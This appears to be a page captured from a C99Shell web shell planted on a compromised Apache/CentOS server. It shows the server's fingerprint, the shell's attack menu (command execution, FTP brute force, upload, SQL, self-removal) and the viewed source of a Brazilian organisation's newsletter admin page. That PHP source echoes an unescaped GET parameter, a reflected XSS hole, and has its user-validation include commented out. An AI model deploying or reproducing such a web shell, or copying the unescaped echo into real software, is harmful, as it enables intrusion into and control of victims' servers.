!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/admin/newsletter/newsletter_i/   drwxr-xr-x
Free 9.43 GB of 93.48 GB (10.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     newsletter_cad.php (17.01 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
    
// Includes

    
include "conexaoBD.php";
    include 
"funcoes_uteis.php";
    include 
"sentencas_sql.php";
    
//include(INCLUDES . "valida_usuario.inc.php");
    
    
$hddAcao    "I";
    
$data_envio date("d/m/Y");
    
$hora_envio date("H:i:s");    
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <link rel="stylesheet" href="http://arpenpr.org.br/css/irpen.css" type="text/css" />
    <title></title>
    <!-- <script src="scripts/delay.js" language="JavaScript"></script> -->  
    <script type="text/javascript" src="includes/jquery-1.2.6.js"></script> 
    <script type="text/javascript" src="includes/jquery.form.js"></script> 
    <script type="text/javascript" src="includes/jquery.maskedinput-1.1.3.js"></script>
    <script type="text/javascript" src="includes/jquery-ui.js"></script>
    <!--link rel="stylesheet" href="flora.datepicker.css" type="text/css" media="screen" title="Flora (Default)"-->
    <!--script type="text/javascript" src="includes/ui.datepicker-pt-BR.js"></script-->
    <script type="text/javascript" src="newsletter_cad.js"></script>
    <!-- TinyMCE -->
    <script type="text/javascript" src="lib/tinymce/tiny_mce.js"></script>
    <script type="text/javascript"src="lib/tinymce/plugins/tinybrowser/tb_tinymce.js.php"></script>
    <script type="text/javascript">
        function fechar() {
            if(confirm('Deseja mesmo fechar a janela?')) {
                window.top.close();
            }
        }
        tinyMCE.init({
            //Opções gerais
            mode : "textareas",
            theme : "advanced",
            language : 'pt',
            plugins :'style,table,advhr,advimage,iespell,searchreplace,contextmenu,paste,noneditable,preview',      
            file_browser_callback : "tinyBrowser",
            button_tile_map : true,
            //force_br_newlines : true,
            //forced_root_block: '', 
            convert_urls : false,
            relative_urls : false,
            fix_list_elements: true, 
            apply_source_formatting : true,
            extended_valid_elements: "fieldset[class|id],legend[class|id],br[class],div[align|class|id]",    
            
            //Css 
            content_css: "../../css/tinymce.css",
            //theme_advanced_styles: "Header 1=header1;Header 2=header2;Header 3=header3;Table Row=tableRow1",    
              
            //Opções do tema      
            theme_advanced_toolbar_location : "top",
            theme_advanced_toolbar_align : "left",    
            theme_advanced_buttons1_add : "fontselect,fontsizeselect,separator,forecolor,backcolor",
            theme_advanced_buttons2_add_before: "cut,copy,paste,pasteword,separator,search,replace,separator",
            theme_advanced_buttons3_add_before : "tablecontrols,separator",
            theme_advanced_buttons3_add : "iespell,advhr", 
            theme_advanced_disable : "styleselect,strikethrough"
           });
    </script>
    <!-- /TinyMCE -->
    
</head>
<body>
    <div id="wrap">
    
        <?php include "topo_gestao.php";?>

        <!-- content-wrap starts -->
        <div id="content-wrap">
            <table width="100%" border="0">
                <tr>
                    <td align="left" valign="top" bgcolor="#FFFFFF" width="1%">&nbsp;
                    </td>
                    <td align="left" valign="top">
                        <table width="100%" border="0" >
                            <tr>
                                <td align="left" valign="top">
                                    <h2>ENVIO DE NEWSLETTER</h2>
                                    <div id="linha_h2" >
                                    </div>            
                                    <form action="newsletter_grava.php" method="post" enctype="application/x-www-form-urlencoded" name="frmEnvioNewsletter" id="frmEnvioNewsletter">
                                        <input type="hidden" name="hddAcao" id="hddAcao" value="<?php echo $hddAcao;?>">
                                        <table width="98%" border="0">
                                            <tr>
                                                <td align="left" valign="top">
                                                </td>
                                            </tr>
                                            <?php
                                                
if((isset($_GET["msg"])) && (!empty($_GET["msg"])))
                                                {
                                                    if((isset(
$_GET["erro"])) && ($_GET["erro"] == "S"))
                                                    {
                                                        
$class_msg "msg_erro";
                                                    }
                                                    else
                                                    {
                                                        
$class_msg "msg_ok";
                                                    }
                                                    
?>
                                                        <tr>
                                                            <td align="left" colspan="2">
                                                                <p class="<?php echo $class_msg;?>"><?php echo $_GET["msg"];?></p>
                                                                <br />
                                                            </td>
                                                        </tr>
                                                    <?php
                                                
}
                                            
?>
                                            <tr>
                                                <td align="left" valign="top" colspan="2">
                                                    <p class="aviso">
                                                        <strong><span class="obrigatorio">*</span> Campos Obrigatórios</strong>
                                                    </p>
                                                </td>
                                            </tr>
                                            <tr>
                                                <td colspan="2" valign="top">  
                                                    <fieldset>
                                                        <legend>Destinatário(s) <span class="obrigatorio">*</span></legend>
                                                        <input type="radio" name="rdgTipoDestinatario" id="rdgTipoDestinatarioT" value="T" checked/> Todos os Ofícios
                                                        &nbsp;
                                                        <input type="radio" name="rdgTipoDestinatario" id="rdgTipoDestinatarioE" value="A" /> Ofícios Associados
                                                        &nbsp;
                                                        <input type="radio" name="rdgTipoDestinatario" id="rdgTipoDestinatarioE" value="N" /> Ofícios Não Associados
                                                        &nbsp;      
                                                        <input type="radio" name="rdgTipoDestinatario" id="rdgTipoDestinatarioE" value="E" /> Escolher Ofícios
                                                        &nbsp;                                                       
                                                        <input type="radio" name="rdgTipoDestinatario" id="rdgTipoDestinatarioTS" value="TS" /> Teste
                                                        
                                                        <div id="escolhe_destinatarios">   
                                                            <br />
                                                            <table width="100% "cellspacing="2" cellpadding="2">
                                                                <tr>
                                                                    <td width="20%">
                                                                        Cidade <span class="obrigatorio">*</span>:
                                                                    </td>
                                                                    <td>
                                                                        <select name="cboCidade" id="cboCidade">
                                                                            <option value="">Selecione...</option>
                                                                            <?       
                                                                                $sql_cidade 
LISTA_CIDADES;

                                                                                
$rs_cidade  $conexao->query($sql_cidade);
                                                                                while(
$cidade $rs_cidade->fetch_array())
                                                                                {
                                                                                    
?>
                                                                                        <option value="<?php echo $cidade['CID_RowID'];?>">
                                                                                            <?php echo $cidade['CID_Descricao'];?>
                                                                                        </option>
                                                                                    <?php
                                                                                
}
                                                                            
?>
                                                                        </select>
                                                                    </td>
                                                                </tr>
                                                                <tr>
                                                                    <td>
                                                                        Ofício <span class="obrigatorio">*</span>:
                                                                    </td>
                                                                    <td>
                                                                        <select name="cboOficio" id="cboOficio">
                                                                            <option value="0">Selecione uma cidade!</option>
                                                                        </select>  
                                                                    </td>
                                                                </tr>
                                                                <tr class="dados_oficio">
                                                                    <td>
                                                                        Nome do Ofício:
                                                                    </td> 
                                                                    <td>
                                                                        <p id="nome_oficio"></p>
                                                                    </td>
                                                                </tr>
                                                                <tr class="dados_oficio">
                                                                    <td>
                                                                        Nome do Tabelião:
                                                                    </td> 
                                                                    <td>
                                                                        <p id="nome_tabeliao"></p>
                                                                    </td>
                                                                </tr>
                                                                <tr>
                                                                    <td colspan="2">
                                                                        <input type="button" name="btnAdicionar" id="btnAdicionar" value="Adicionar" disabled />                                                       
                                                                        <input type="button" name="btnRemover" id="btnRemover" value="Remover" disabled />        
                                                                        <br />
                                                                        <select name="cboDestinatarios[]" id="cboDestinatarios" multiple="multiple">
                                                                        </select>
                                                                    </td> 
                                                                </tr>
                                                            </table>
                                                        </div>  
                                                    </fieldset>      
                                                </td>
                                            </tr>
                                            <tr>
                                                <td width="15%" align="left" valign="top"> 
                                                    <label for="txtAssunto">
                                                        Assunto <span class="obrigatorio">*</span>:
                                                    </label> 
                                                </td>
                                                <td width="85%" align="left" valign="top">
                                                     <input type="text" name="txtAssunto" id="txtAssunto" size="80" />    
                                                </td>
                                            </tr>
                                            <!--tr>
                                                <td colspan="2" valign="top">
                                                    <fieldset>
                                                        <legend>Data de Envio <span class="obrigatorio">*</span></legend>
                                                        Data: <?php echo $data_envio;?> -->
                                                        <input type="hidden" name="txtDataEnvio" id="txtDataEnvio1" size="12" value="<?php echo $data_envio;?>" /> 
                                                        <!--Hora: <?php echo $hora_envio;?> -->
                                                        <input type="hidden" name="txtHoraEnvio" id="txtHoraEnvio1" size="10" value="<?php echo $hora_envio;?>" />
                                                    <!--/fieldset>      
                                                </td>
                                            </tr--> 
                                            <tr class="textoDif2">
                                                <td colspan="2" valign="top">
                                                     <fieldset>
                                                        <legend>Conteúdo<span class="obrigatorio">*</span></legend>
                                                        <textarea name="txtConteudo" rows="20" style="width:100%"></textarea>
                                                    </fieldset>
                                                </td>
                                            </tr> 
                                       
                                        <br />
                                        <tr>
                                            <td align="center" colspan="2">
                                                <input name="btnEnviar" type="submit" value="Enviar" />
                                                <input name="btnLimpar" type="reset" value="Limpar" />
                                                <input name="btnFechar" type="button" value="Fechar" onclick="fechar();" />
                                            </td>
                                        </tr>
                                        </table>
                                    </form>
                                </td>
                            </tr>
                        </table>
                        <br />
                    </td>
                </tr>
            </table>
        </div> 
        <div align="center">
            <strong><br />
            Rua Mal. Deodoro, 51 - Galeria Ritz - 18º Andar | Fone: (41) 3232-9811 | CEP 80.020-905 - Curitiba - Paraná</strong>
            <!-- content-wrap ends-->
        </div>
        <!-- footer starts -->
        <div id="footer-wrap">
        </div>
        <div id="rodape">
        </div>
    </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0049 ]--